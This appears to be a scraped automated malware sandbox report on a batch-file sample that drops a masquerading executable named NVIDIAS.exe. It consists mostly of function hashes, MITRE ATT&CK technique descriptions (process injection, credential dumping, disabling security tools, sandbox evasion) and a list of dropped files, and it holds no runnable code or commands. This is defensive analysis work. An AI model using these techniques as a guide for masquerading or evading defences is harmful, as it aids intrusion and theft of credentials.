Instruction Fuzzy Hash: E7E0EC367006148F8328EB6DE454C5AB7EAEFCA62535105BDE109DB761CB72EC02CB50

Function 055A014B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844ebc25093aa5247597b4216ede08ad1cc37c4c5c58d185605447129304a247
Instruction ID: 82db21f00fb9af7e9455e6c0e1e4398f6126202214f103f0f52e3f9f8127bbbd
Opcode Fuzzy Hash: 844ebc25093aa5247597b4216ede08ad1cc37c4c5c58d185605447129304a247
Instruction Fuzzy Hash: 1CE0D88480D7C00FC713972848A53E43F70AE07140B9E20CAC0E18F1B7C109814AC72A

Function 055A0EF1 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3b28cf2dc205e1cb94d05cca27014e0fef409492ad34463dfe0bab21e2855bb
Instruction ID: 0a26d1ed99460afbdaad7dae16c0f82cfe29c00f9e74b39f763cacccf4e91c36
Opcode Fuzzy Hash: e3b28cf2dc205e1cb94d05cca27014e0fef409492ad34463dfe0bab21e2855bb
Instruction Fuzzy Hash: F1D0A7B3304120175718596F6C54D5BD5D9E7D9660754457AF504D3300CC508C00C2F1

Function 07317390 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 258206452992a222ed7655e936ec9e1e8c14df7096a967598e0d21c9798c450e
Instruction ID: 66e120ecc9b30b86e0880df738d7eb3274b140498671b5079b02be28ccc3a8da
Opcode Fuzzy Hash: 258206452992a222ed7655e936ec9e1e8c14df7096a967598e0d21c9798c450e
Instruction Fuzzy Hash: EDD05E362406245BE604AA58D811B8577A99B48625F4401A6E605CB361C952EC024BD8

Function 055A2D26 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45f6a5cc9fb3b00511c8087a7b03002572444ba70d63f3f2c9e8e360019d1383
Instruction ID: c436c7f9beb8540e1eb8547a2d5981d4e44da763b4aec1976e23296b79fbef26
Opcode Fuzzy Hash: 45f6a5cc9fb3b00511c8087a7b03002572444ba70d63f3f2c9e8e360019d1383
Instruction Fuzzy Hash: 47E0E2C650E7C00FC3030234A8613453F70AB93619F0F40DBD080CB9A3F1994D6987A2

Function 07312B30 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c560291d420064ad2168d5a4e2d8169262ae9cf526e2dbff3cd44d5c2270335
Instruction ID: 85e98b391664038a1f452db0d6b1e75634909e26ecfdb741e3e281d35a8c435e
Opcode Fuzzy Hash: 1c560291d420064ad2168d5a4e2d8169262ae9cf526e2dbff3cd44d5c2270335
Instruction Fuzzy Hash: ACE012313110514FC759DA9CE551D35B3DAFF89700716C4ADA40DCF7A6EE25DC428744

Function 033AD210 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab9fa90d36af249997706b23dd87e237d59ffcfc74c3d2fb3dfab216b9d7347b
Instruction ID: 59b84856e1764d833ecce68a05b403fe61fe0ea012ac849069126e594caa912d
Opcode Fuzzy Hash: ab9fa90d36af249997706b23dd87e237d59ffcfc74c3d2fb3dfab216b9d7347b
Instruction Fuzzy Hash: B6D05E387016148FC784AB6CD414818BBE9EF4962531540A9E809CB321CE32EC038B80

Function 033A0848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b84f504eee4090771515e1824602273ecf563a2d78e563c905edced52e366cac
Instruction ID: 777e0690b9dc8b725af46a24b26d079a847e2ac1c236a23bef61c54c5cfec6eb
Opcode Fuzzy Hash: b84f504eee4090771515e1824602273ecf563a2d78e563c905edced52e366cac
Instruction Fuzzy Hash: B3D01275A00208EF8B44DFE4DA1565DB7F6EB8921075040D9F505D7344DA311F01DB51

Function 055A0210 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29a00ec68bd0791a451122f3c560e3f7c91f2a3e729f2e1426d2d2afabca12a5
Instruction ID: f2dbaf4a34d96a2a817c5eb3f88927accaad1749a0031ea01eaf229899e42fa3
Opcode Fuzzy Hash: 29a00ec68bd0791a451122f3c560e3f7c91f2a3e729f2e1426d2d2afabca12a5
Instruction Fuzzy Hash: D2D05E35B503098F871C96D9E02852933E77FCD51172040B890098B274EF31AC418A41

Function 055A1288 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22da96eebfcf07f2614dcdc3495b0d2622f8734f0df1389f4b70e6586fa0b73c
Instruction ID: 204f45b8037e0d05a599dcf5184a598ab6d959ec47ed8cbecd6523449ccb8018
Opcode Fuzzy Hash: 22da96eebfcf07f2614dcdc3495b0d2622f8734f0df1389f4b70e6586fa0b73c
Instruction Fuzzy Hash: EAD05E32B00A09CF87088BDFE514D6A73A77FCA5107648464A00ACB224EB21DC00C796

Function 033ACB82 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 359558d6ae13daa443c1dd3f20507cfc152783d91c70d7cdcae0dd9bc2edcc2b
Instruction ID: 48aeca34d50a472dfc25c0191729fa62deb8fcda3985ee288bd222ced0efb914
Opcode Fuzzy Hash: 359558d6ae13daa443c1dd3f20507cfc152783d91c70d7cdcae0dd9bc2edcc2b
Instruction Fuzzy Hash: 2BE0E2342442408FC740CB28C884840BBB2EF8A21831985EAD048CBB22D636E807CB00

Function 0731DBD0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e3b281fd4dcd77b9055e5698743a5f43aea53dc35b21bfbf64ad425fe689ba
Instruction ID: ebf149543559f74254a0e12ebad473968422e14717e696ac26e23660df0ea77f
Opcode Fuzzy Hash: d4e3b281fd4dcd77b9055e5698743a5f43aea53dc35b21bfbf64ad425fe689ba
Instruction Fuzzy Hash: 98D01730A10208EFCB08DFA8DA5259DBBF9FB85220B5041A9A808D7210EA316F04EB81

Function 033AB7C9 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0d31dddd855e2f6a0e77f7e5376c070bc5a1a14be9feaaf0555df26351227b1
Instruction ID: 15cfb0d0d73d8bb9c9d063e914fb2e326efc7ed66e3324469e59d2160b7c1936
Opcode Fuzzy Hash: f0d31dddd855e2f6a0e77f7e5376c070bc5a1a14be9feaaf0555df26351227b1
Instruction Fuzzy Hash: 44D05E306093A14FC34A9B28A850145FFB1BF8A27031BC3EAE488CB313D620DC8E8760

Function 073173A0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c27cc2e7a18a88a22455f24809beaeda0be7c68b1f77c867a377bc686b1426
Instruction ID: 9cf41ce4f728e77787ab69a59250b60662cb0dd4ac04433ee38174f4cbf0decc
Opcode Fuzzy Hash: 91c27cc2e7a18a88a22455f24809beaeda0be7c68b1f77c867a377bc686b1426
Instruction Fuzzy Hash: 91C012313002244BD604AA5CD410D59739D9B49724B0101A6E609CB361C992EC4147D8

Function 033AF759 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24ebb450820cd7296b703ec011664dbba6ee7aa1fd2398aab6aee9ca525febe4
Instruction ID: 99e2850cea552dc5dbc0f50860fbd18812de66fda8f82ba32a7289d23b94480b
Opcode Fuzzy Hash: 24ebb450820cd7296b703ec011664dbba6ee7aa1fd2398aab6aee9ca525febe4
Instruction Fuzzy Hash: C8C02B323101610FDA44B22CB4108DC82C67EC5270388067AE004DF208CF50DD0243DB

Function 055A1DF0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6881339cfe93604a2a103e37503e4f1e27c66473085aa36cfbdbd5844c9fb82
Instruction ID: 71b3961edd19491d609789c17cf8ce0af71414f06d5845b7ee740cd7478ba4ed
Opcode Fuzzy Hash: a6881339cfe93604a2a103e37503e4f1e27c66473085aa36cfbdbd5844c9fb82
Instruction Fuzzy Hash: 6BC09B797403459BC614F6B6A541C27739E9BC6904330C56DE10A8B315DD3FFC02C6D4

Function 07315B44 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ea47686db7f40dcac44196b52f6dcbce78aefef1d0ac52496dcdf88bb563dbc
Instruction ID: 2abc709ccd1e7e374ba53da5867b87be328f55f847ddca11dafa3158c0b4d940
Opcode Fuzzy Hash: 0ea47686db7f40dcac44196b52f6dcbce78aefef1d0ac52496dcdf88bb563dbc
Instruction Fuzzy Hash: D5D01276310058DB8B015F55EC549BE7FAAEF982227048026F699C5001CB319422DF70

Function 033ACB90 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c83be5f003e00b8d190a7323357476b95527142a6d1f1e6151771a48f32cb
Instruction ID: 2766da562f3e1a9fa2858af7536e661d92a05aaef3db48e407eab7465cbb5324
Opcode Fuzzy Hash: 2f9c83be5f003e00b8d190a7323357476b95527142a6d1f1e6151771a48f32cb
Instruction Fuzzy Hash: B0C002343506088F8744DA5DD484815B3EAAF8DA1836480E9E94DCB726DA32FC038A40

Function 07312B80 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e408d0ccc382197e953ef0a0ad7bdbc65219fcac55d45a6a9da76220c8c627e4
Instruction ID: a3aa48f2b612c509cbb10f0b5f996117e0cec997a1d5bd2c5d3d0f1766eb5aeb
Opcode Fuzzy Hash: e408d0ccc382197e953ef0a0ad7bdbc65219fcac55d45a6a9da76220c8c627e4
Instruction Fuzzy Hash: 18C04CF21A010D8B5A189BA9B04D89E7B5CE76C6157408013F6298D501DB32A4A4E665

Function 05D4EF94 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2538a09690278a746d1158ee95a0f6622a97b72d2ee1339c810ad7de081bff2
Instruction ID: 92f2da28513bc95925f95e60b52ada6d1a200521eb465f3d3f85f6a70de774f8
Opcode Fuzzy Hash: e2538a09690278a746d1158ee95a0f6622a97b72d2ee1339c810ad7de081bff2
Instruction Fuzzy Hash: CED0C93094420AEBDB20CF40C6197EDBBB4FB44315F300816D102A15C0C7750948EF52

Function 055A2860 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a5742125de8c5666200f50521f2ca89dda70cb7889aa616034d04efdb59409
Instruction ID: 98d5fff0bdd0a2c7214454862ae706ab2ea9e7ec8a1a7c891bc6ec63a028c719
Opcode Fuzzy Hash: 61a5742125de8c5666200f50521f2ca89dda70cb7889aa616034d04efdb59409
Instruction Fuzzy Hash: BFB09234754388878A0822EE21581AEB29A76C8A80B600428A54E8324ADE21E8014296

Function 055A0348 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a4ffe3bf7bbe10909689a9811e3b15e426d89c270974cb6d814668784dfd40
Instruction ID: 7f0a534baea58588f57bab61826f5b340e1a07540d65d621d24be3e70f6626dd
Opcode Fuzzy Hash: 03a4ffe3bf7bbe10909689a9811e3b15e426d89c270974cb6d814668784dfd40
Instruction Fuzzy Hash: 6DB012303012048BC75C7238002027D31537FC01003E4887C40114E244CD7DC8825610

Function 055A061E Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d1791ba55b99a195130e34892913e274bc3a2457f997e74aefd703dacbb8ea
Instruction ID: 03c369f3483b2c6e54dd934f958a875f2d175ea525b42a9d95bbd652d3cd882c
Opcode Fuzzy Hash: f1d1791ba55b99a195130e34892913e274bc3a2457f997e74aefd703dacbb8ea
Instruction Fuzzy Hash: 18A02202300830030C80303C300028E0CC0AB82CF038300ECE000FF308CE020E0A23CE

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3gJQoqWpxb.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NVIDIAS.exe_7d7dca90318b5fff3d235e3586e41d292c5da1_886ea9ce_12c24859-32ba-4d91-908e-7d18a5d7457f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A29.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B44.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B64.tmp.xml

C:\ProgramData\QQQ\NVIDIAS.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15mlfwau.pcf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_345rq2ap.ftm.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cp5zxzto.szi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipcca0ta.aln.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5esurz3.4we.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnaa1xe5.m4v.ps1

Windows Analysis Report
3gJQoqWpxb.bat

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

